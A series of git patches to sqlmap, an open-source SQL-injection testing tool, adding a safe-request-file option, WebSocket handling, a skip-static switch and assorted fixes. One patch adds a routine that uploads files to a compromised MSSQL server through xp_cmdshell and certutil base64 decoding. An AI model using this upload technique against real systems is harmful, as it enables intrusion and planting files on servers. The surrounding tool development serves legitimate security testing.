+    Check and set the safe visit options.
     """
-    if not conf.safeUrl:
+    if not any ((conf.safeUrl, conf.safeReqFile)):
         return
 
-    if not re.search("^http[s]*://", conf.safeUrl):
-        if ":443/" in conf.safeUrl:
-            conf.safeUrl = "https://" + conf.safeUrl
+    if conf.safeReqFile:
+        checkFile(conf.safeReqFile)
+
+        raw = readCachedFileContent(conf.safeReqFile)
+        match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])
+
+        if match:
+            kb.safeReq.method = match.group(1)
+            kb.safeReq.url = match.group(2)
+            kb.safeReq.headers = {}
+
+            for line in raw[raw.find('\n') + 1:].split('\n'):
+                line = line.strip()
+                if line and ':' in line:
+                    key, value = line.split(':', 1)
+                    value = value.strip()
+                    kb.safeReq.headers[key] = value
+                    if key == HTTP_HEADER.HOST:
+                        if not value.startswith("http"):
+                            scheme = "http"
+                            if value.endswith(":443"):
+                                scheme = "https"
+                            value = "%s://%s" % (scheme, value)
+                        kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
+                else:
+                    break
+
+            post = None
+
+            if '\r\n\r\n' in raw:
+                post = raw[raw.find('\r\n\r\n') + 4:]
+            elif '\n\n' in raw:
+                post = raw[raw.find('\n\n') + 2:]
+
+            if post and post.strip():
+                kb.safeReq.post = post
+            else:
+                kb.safeReq.post = None
         else:
-            conf.safeUrl = "http://" + conf.safeUrl
+            errMsg = "invalid format of a safe request file"
+            raise SqlmapSyntaxException, errMsg
+    else:
+        if not re.search("^http[s]*://", conf.safeUrl):
+            if ":443/" in conf.safeUrl:
+                conf.safeUrl = "https://" + conf.safeUrl
+            else:
+                conf.safeUrl = "http://" + conf.safeUrl
 
     if conf.safeFreq <= 0:
-        errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe URL feature"
+        errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
         raise SqlmapSyntaxException(errMsg)
 
 def _setPrefixSuffix():
@@ -1791,6 +1833,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.responseTimes = []
     kb.resumeValues = True
     kb.safeCharEncode = False
+    kb.safeReq = AttribDict()
     kb.singleLogFlags = set()
     kb.reduceTests = None
     kb.stickyDBMS = False
@@ -2265,8 +2308,12 @@ def _basicOptionValidation():
         errMsg = "option '--safe-post' requires usage of option '--safe-url'"
         raise SqlmapSyntaxException(errMsg)
 
-    if conf.safeFreq and not conf.safeUrl:
-        errMsg = "option '--safe-freq' requires usage of option '--safe-url'"
+    if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
+        errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
+        errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
         raise SqlmapSyntaxException(errMsg)
 
     if conf.csrfUrl and not conf.csrfToken:
@@ -2416,7 +2463,7 @@ def init():
         _setHTTPAuthentication()
         _setHTTPProxy()
         _setDNSCache()
-        _setSafeUrl()
+        _setSafeVisit()
         _setGoogleDorking()
         _setBulkMultipleTargets()
         _setSitemapTargets()
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index da71e84c1..3fbc3de47 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -52,6 +52,7 @@ optDict = {
                                "rParam":            "string",
                                "safeUrl":           "string",
                                "safePost":          "string",
+                               "safeReqFile":       "string",
                                "safeFreq":          "integer",
                                "skipUrlEncode":     "boolean",
                                "csrfToken":         "string",
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 9a9787adb..d252fe4fa 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -191,6 +191,9 @@ def cmdLineParser():
         request.add_option("--safe-post", dest="safePost",
                            help="POST data to send to a safe URL")
 
+        request.add_option("--safe-req", dest="safeReqFile",
+                           help="Load safe HTTP request from a file")
+
         request.add_option("--safe-freq", dest="safeFreq", type="int",
                            help="Test requests between two visits to a given safe URL")
 
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 3321b9d85..71f50e16a 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -971,10 +971,13 @@ class Connect(object):
                     warnMsg += "10 or more)"
                     logger.critical(warnMsg)
 
-        if conf.safeUrl and conf.safeFreq > 0:
+        if conf.safeFreq > 0:
             kb.queryCounter += 1
             if kb.queryCounter % conf.safeFreq == 0:
-                Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+                if conf.safeUrl:
+                    Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)
+                elif kb.safeReq:
+                    Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers)
 
         start = time.time()
 
diff --git a/sqlmap.conf b/sqlmap.conf
index 498c3d3e8..7f9e3d5f4 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -156,6 +156,9 @@ safeUrl =
 # Example: username=admin&password=passw0rd!
 safePost = 
 
+# Load safe HTTP request from a file.
+safeReqFile = 
+
 # Test requests between two visits to a given safe URL (default 0).
 # Valid: integer
 # Default: 0

From a94dcf94e9772347e259cddec93f777160e9eca9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Apr 2015 16:41:20 +0200
Subject: [PATCH 416/492] =?UTF-8?q?Patch=20for=20an=20Issue=20#1226=C4=91?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 lib/utils/api.py | 15 +++++++++++----
 1 file changed, 11 insertions(+), 4 deletions(-)

diff --git a/lib/utils/api.py b/lib/utils/api.py
index 15a1047b6..987391c55 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -77,10 +77,17 @@ class Database(object):
         self.connection.commit()
 
     def execute(self, statement, arguments=None):
-        if arguments:
-            self.cursor.execute(statement, arguments)
-        else:
-            self.cursor.execute(statement)
+        while True:
+            try:
+                if arguments:
+                    self.cursor.execute(statement, arguments)
+                else:
+                    self.cursor.execute(statement)
+            except sqlite3.OperationalError, ex:
+                if not "locked" in ex.message:
+                    raise
+            else:
+                break
 
         if statement.lstrip().upper().startswith("SELECT"):
             return self.cursor.fetchall()

From 03f32ae2b689ec5cd0cece743d52e8c0ed93fa36 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 22 Apr 2015 17:21:55 +0200
Subject: [PATCH 417/492] Merge of an Issue #1227

---
 doc/THANKS.md                          |  3 +++
 lib/takeover/xp_cmdshell.py            |  4 +--
 plugins/dbms/mssqlserver/filesystem.py | 36 ++++++++++++++++++++++++++
 3 files changed, 41 insertions(+), 2 deletions(-)

diff --git a/doc/THANKS.md b/doc/THANKS.md
index 6af144cd5..931ab73bc 100644
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -621,6 +621,9 @@ abc abc, <biedimc(at)gmx.net>
 Abuse 007, <abuse007(at)gmail.com>
 * for reporting a bug
 
+agix, <florian.gaultier@gmail.com>
+* for contributing the file upload via certutil.exe functionality
+
 Alex, <m3zero(at)gmail.com>
 * for reporting a minor bug
 
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index 53f3a0722..f9c5f0b8f 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -142,13 +142,13 @@ class Xp_cmdshell:
             charCounter += len(echoedLine)
 
             if charCounter >= maxLen:
-                self.xpCmdshellExecCmd(cmd)
+                self.xpCmdshellExecCmd(cmd.rstrip(" & "))
 
                 cmd = ""
                 charCounter = 0
 
         if cmd:
-            self.xpCmdshellExecCmd(cmd)
+            self.xpCmdshellExecCmd(cmd.rstrip(" & "))
 
     def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
         # When user provides DBMS credentials (with --dbms-cred) we need to
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
index 3e8cfb4f6..eca533d01 100644
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@@ -337,6 +337,33 @@ class Filesystem(GenericFilesystem):
 
         self.execCmd(complComm)
 
+    def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
+        infoMsg = "using certutil.exe to write the %s " % fileType
+        infoMsg += "file content to file '%s', please wait.." % dFile
+        logger.info(infoMsg)
+
+        chunkMaxSize = 500
+        dFileName = ntpath.basename(dFile)
+
+        randFile = "tmpf%s.txt" % randomStr(lowercase=True)
+        randFilePath = "%s\%s" % (tmpPath, randFile)
+
+        encodedFileContent = base64encode(wFileContent)
+
+        splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
+
+        logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
+
+        self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
+
+        logger.debug("decoding the file to %s.." % dFile)
+
+        commands = ("cd \"%s\"" % tmpPath, "certutil -f -decode %s %s" % (randFile, dFile),
+                     "del /F /Q %s" % randFile)
+        complComm = " & ".join(command for command in commands)
+
+        self.execCmd(complComm)
+
     def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
         # NOTE: this is needed here because we use xp_cmdshell extended
         # procedure to write a file on the back-end Microsoft SQL Server
@@ -371,4 +398,13 @@ class Filesystem(GenericFilesystem):
                 self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
                 written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
 
+        if written is False:
+            message = "do you want to try to upload the file with "
+            message += "the built-in certutil.exe technique? [Y/n] "
+            choice = readInput(message, default="Y")
+
+            if not choice or choice.lower() == "y":
+                self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
+                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+
         return written

From 5ee7fd785ad753ba3c4070eca010872255544cab Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 1 May 2015 00:48:08 +0200
Subject: [PATCH 418/492] Fixes #1235

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 66cbc7b14..36a0b2909 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -273,7 +273,7 @@ ERROR_PARSING_REGEXES = (
 META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
 
 # Regular expression used for parsing refresh info from meta html headers
-META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
+META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
 
 # Regular expression used for parsing empty fields in tested form data
 EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'

From 84ba3d45c1c129a81f6f784b2b04d0d321423ccf Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 4 May 2015 21:47:10 +0200
Subject: [PATCH 419/492] Patch for an Issue #1238

---
 lib/techniques/blind/inference.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 071fe63a2..5419bd9cb 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -314,10 +314,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                                         errMsg = "invalid character detected. retrying.."
                                         logger.error(errMsg)
 
-                                        conf.timeSec += 1
-
-                                        warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
-                                        logger.warn(warnMsg)
+                                        if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
+                                            conf.timeSec += 1
+                                            warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
+                                            logger.warn(warnMsg)
 
                                         if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
                                             dbgMsg = "turning off time auto-adjustment mechanism"

From 18e62fd5072c09a084dfd652df98702aa8d313e9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 5 May 2015 14:36:21 +0200
Subject: [PATCH 420/492] Fix for an Issue #1240

---
 lib/utils/api.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/api.py b/lib/utils/api.py
index 987391c55..396d689d9 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -155,7 +155,7 @@ class Task(object):
 
     def engine_start(self):
         self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
-                             shell=False, stdin=PIPE, close_fds=False)
+                             shell=False, stdin=PIPE, close_fds=True)
 
     def engine_stop(self):
         if self.process:

From 4b2ff4339ae3c3a0d4852aed25b6764d864ba9df Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 7 May 2015 12:36:23 +0200
Subject: [PATCH 421/492] Fixes #1243

---
 lib/utils/api.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/utils/api.py b/lib/utils/api.py
index 396d689d9..357d4d3b5 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -32,6 +32,7 @@ from lib.core.enums import PART_RUN_CONTENT_TYPES
 from lib.core.exception import SqlmapConnectionException
 from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict
+from lib.core.settings import IS_WIN
 from lib.core.subprocessng import Popen
 from thirdparty.bottle.bottle import error as return_error
 from thirdparty.bottle.bottle import get
@@ -155,7 +156,7 @@ class Task(object):
 
     def engine_start(self):
         self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)],
-                             shell=False, stdin=PIPE, close_fds=True)
+                             shell=False, stdin=PIPE, close_fds=not IS_WIN)
 
     def engine_stop(self):
         if self.process:

From 5b8df7984c0efc711ad8b80b400ef501850b3569 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 9 May 2015 14:32:55 +0200
Subject: [PATCH 422/492] Minor update (for Windows-31j charset)

---
 lib/request/basic.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/basic.py b/lib/request/basic.py
index 9815b59ed..c50ef2a73 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -142,7 +142,7 @@ def checkCharEncoding(encoding, warn=True):
         return encoding
 
     # Reference: http://www.destructor.de/charsets/index.htm
-    translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8",  "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk"}
+    translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8",  "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
 
     for delimiter in (';', ',', '('):
         if delimiter in encoding:

From 91bc02e3baa5af18d276bcbe9969f8b17ba7716f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 11 May 2015 10:56:10 +0200
Subject: [PATCH 423/492] Fixes related to the #1206

---
 lib/request/connect.py | 119 +++++++++++++++++++++++------------------
 1 file changed, 67 insertions(+), 52 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 549a261fb..436bbaeaa 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -239,7 +239,8 @@ class Connect(object):
         retrying = kwargs.get("retrying",           False)
         crawling = kwargs.get("crawling",           False)
         skipRead = kwargs.get("skipRead",           False)
-        is_websocket = conf.url.startswith("ws")
+
+        websocket_ = url.lower().startswith("ws")
 
         if not urlparse.urlsplit(url).netloc:
             url = urlparse.urljoin(conf.url, url)
@@ -372,75 +373,89 @@ class Connect(object):
             url = unicodeencode(url)
             post = unicodeencode(post, kb.pageEncoding)
 
-            if is_websocket:
-                # WebSocket will add Host field of headers automatically
-                disallowed_headers = ['Host']
+            if websocket_:
                 ws = websocket.WebSocket()
-                ws.connect(url, header=["%s: %s" % _ for _ in headers.items() if _[0] not in disallowed_headers], cookie=cookie)
-                ws.send(urldecode(post) if post else '')
-                response = ws.recv()
+                ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie)  # WebSocket will add Host field of headers automatically
+                ws.send(urldecode(post or ""))
+                page = ws.recv()
                 ws.close()
-                # WebSocket class does not have response headers
-                return response, {}, 101
+                code = ws.status
+                status = httplib.responses[code]
+                class _(dict):
+                    pass
+                responseHeaders = _(ws.getheaders())
+                responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()]
 
-            elif method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
-                method = unicodeencode(method)
-                req = MethodRequest(url, post, headers)
-                req.set_method(method)
+                requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())
+                requestMsg += "\n%s" % requestHeaders
+
+                if post is not None:
+                    requestMsg += "\n\n%s" % getUnicode(post)
+
+                requestMsg += "\n"
+
+                threadData.lastRequestMsg = requestMsg
+
+                logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
             else:
-                req = urllib2.Request(url, post, headers)
+                if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST):
+                    method = unicodeencode(method)
+                    req = MethodRequest(url, post, headers)
+                    req.set_method(method)
+                else:
+                    req = urllib2.Request(url, post, headers)
 
-            requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
+                requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items())
 
-            if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
-                conf.cj._policy._now = conf.cj._now = int(time.time())
-                cookies = conf.cj._cookies_for_request(req)
-                requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
+                if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
+                    conf.cj._policy._now = conf.cj._now = int(time.time())
+                    cookies = conf.cj._cookies_for_request(req)
+                    requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))
 
-            if post is not None:
-                if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
-                    requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
+                if post is not None:
+                    if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
+                        requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
 
-            if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
-                requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
+                if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
+                    requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
 
-            requestMsg += "\n%s" % requestHeaders
+                requestMsg += "\n%s" % requestHeaders
 
-            if post is not None:
-                requestMsg += "\n\n%s" % getUnicode(post)
+                if post is not None:
+                    requestMsg += "\n\n%s" % getUnicode(post)
 
-            requestMsg += "\n"
+                requestMsg += "\n"
 
-            threadData.lastRequestMsg = requestMsg
+                threadData.lastRequestMsg = requestMsg
 
-            logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
+                logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)
 
-            conn = urllib2.urlopen(req)
+                conn = urllib2.urlopen(req)
 
-            if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
-                kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
+                if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower():
+                    kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)
 
-            if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
-                kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
+                if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
+                    kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)
 
-            # Return response object
-            if response:
-                return conn, None, None
+                # Return response object
+                if response:
+                    return conn, None, None
 
-            # Get HTTP response
-            if hasattr(conn, 'redurl'):
-                page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
-                  else Connect._connReadProxy(conn)) if not skipRead else None
-                skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
-                code = conn.redcode
-            else:
-                page = Connect._connReadProxy(conn) if not skipRead else None
+                # Get HTTP response
+                if hasattr(conn, 'redurl'):
+                    page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
+                    else Connect._connReadProxy(conn)) if not skipRead else None
+                    skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
+                    code = conn.redcode
+                else:
+                    page = Connect._connReadProxy(conn) if not skipRead else None
 
-            code = code or conn.code
-            responseHeaders = conn.info()
-            responseHeaders[URI_HTTP_HEADER] = conn.geturl()
-            page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
-            status = getUnicode(conn.msg)
+                code = code or conn.code
+                responseHeaders = conn.info()
+                responseHeaders[URI_HTTP_HEADER] = conn.geturl()
+                page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
+                status = getUnicode(conn.msg)
 
             if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
                 url = extractRegexResult(META_REFRESH_REGEX, page)
@@ -474,7 +489,7 @@ class Connect(object):
                         pass
 
             # Explicit closing of connection object
-            if not conf.keepAlive:
+            if conn and not conf.keepAlive:
                 try:
                     if hasattr(conn.fp, '_sock'):
                         conn.fp._sock.close()

From e8f87bfa411371358922a76d83429ae22340cd1c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 11 May 2015 11:01:21 +0200
Subject: [PATCH 424/492] Minor patches related to the #1206

---
 lib/core/option.py     | 6 ++++--
 lib/request/connect.py | 2 +-
 lib/utils/deps.py      | 6 +++---
 3 files changed, 8 insertions(+), 6 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 64c2641b6..34391841d 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -2181,13 +2181,15 @@ def _setTorSocksProxySettings():
     socks.wrapmodule(urllib2)
 
 def _checkWebSocket():
-    infoMsg = "checking URL is WebSocket or not"
+    infoMsg = "checking for WebSocket"
     logger.debug(infoMsg)
+
     if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")):
         try:
             from websocket import ABNF
         except ImportError:
-            errMsg = "it seems that python 'websocket-client' third-party library not be installed. "
+            errMsg = "sqlmap requires third-party module 'websocket-client' "
+            errMsg += "in order to use WebSocket funcionality"
             raise SqlmapMissingDependence(errMsg)
 
 def _checkTor():
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 436bbaeaa..4dc9bb0f7 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -599,7 +599,7 @@ class Connect(object):
                 warnMsg += "from the target URL"
             elif "Handshake status" in tbMsg:
                 status = re.search("Handshake status ([\d]{3})", tbMsg)
-                errMsg = "websocket handshake status %s" % status.group(1) if status else 'unknown'
+                errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown"
                 raise SqlmapConnectionException(errMsg)
             else:
                 warnMsg = "unable to connect to the target URL"
diff --git a/lib/utils/deps.py b/lib/utils/deps.py
index d25c8ea94..efca6e1c3 100644
--- a/lib/utils/deps.py
+++ b/lib/utils/deps.py
@@ -72,7 +72,7 @@ def checkDependencies():
         debugMsg = "'python-ntlm' third-party library is found"
         logger.debug(debugMsg)
     except ImportError:
-        warnMsg = "sqlmap requires 'python-ntlm' third-party library for "
+        warnMsg = "sqlmap requires 'python-ntlm' third-party library "
         warnMsg += "if you plan to attack a web application behind NTLM "
         warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/"
         logger.warn(warnMsg)
@@ -83,8 +83,8 @@ def checkDependencies():
         debugMsg = "'python websocket-client' library is found"
         logger.debug(debugMsg)
     except ImportError:
-        warnMsg = "sqlmap requires 'python websocket-client' third-party library for "
-        warnMsg += "if you plan to attack a web application behind websocket. "
+        warnMsg = "sqlmap requires 'websocket-client' third-party library "
+        warnMsg += "if you plan to attack a web application using WebSocket. "
         warnMsg += "Download from https://pypi.python.org/pypi/websocket-client/"
         logger.warn(warnMsg)
         missing_libraries.add('websocket-client')

From 17bfda1b9c77b9eae2c109a1794bcd24cde2b8fb Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 18 May 2015 20:57:15 +0200
Subject: [PATCH 425/492] Adding new switch ('--skip-static')

---
 lib/controller/controller.py | 7 ++++++-
 lib/core/optiondict.py       | 1 +
 lib/parse/cmdline.py         | 3 +++
 sqlmap.conf                  | 4 ++++
 4 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index b217438a9..3fb86150d 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -476,13 +476,18 @@ def start():
                             infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
-                        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
+                        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
                             check = checkDynParam(place, parameter, value)
 
                             if not check:
                                 warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
                                 logger.warn(warnMsg)
 
+                                if conf.skipStatic:
+                                    infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
+                                    logger.info(infoMsg)
+
+                                    testSqlInj = False
                             else:
                                 infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
                                 logger.info(infoMsg)
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 3fbc3de47..49eae9230 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -73,6 +73,7 @@ optDict = {
             "Injection":     {
                                "testParameter":     "string",
                                "skip":              "string",
+                               "skipStatic":        "boolean",
                                "dbms":              "string",
                                "dbmsCred":          "string",
                                "os":                "string",
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index d252fe4fa..60cadde7b 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -252,6 +252,9 @@ def cmdLineParser():
         injection.add_option("--skip", dest="skip",
                              help="Skip testing for given parameter(s)")
 
+        injection.add_option("--skip-static", dest="skipStatic", action="store_true",
+                             help="Skip testing parameters that not appear dynamic")
+
         injection.add_option("--dbms", dest="dbms",
                              help="Force back-end DBMS to this value")
 
diff --git a/sqlmap.conf b/sqlmap.conf
index 7f9e3d5f4..0fc5fb728 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -222,6 +222,10 @@ testParameter =
 # Skip testing for given parameter(s).
 skip =
 
+# Skip testing parameters that not appear dynamic.
+# Valid: True or False
+skipStatic = False
+
 # Force back-end DBMS to this value. If this option is set, the back-end
 # DBMS identification process will be minimized as needed.
 # If not set, sqlmap will detect back-end DBMS automatically by default.

From 699c965bc0791f2201b994b4c06a115503fceb61 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 19 May 2015 18:40:45 +0200
Subject: [PATCH 426/492] Fixes #1248

---
 lib/takeover/web.py | 37 +++++++++++++++----------------------
 1 file changed, 15 insertions(+), 22 deletions(-)

diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 601351296..8fab16c3b 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -5,10 +5,11 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import urlparse
 import os
+import posixpath
 import re
 import StringIO
+import urlparse
 
 from tempfile import mkstemp
 
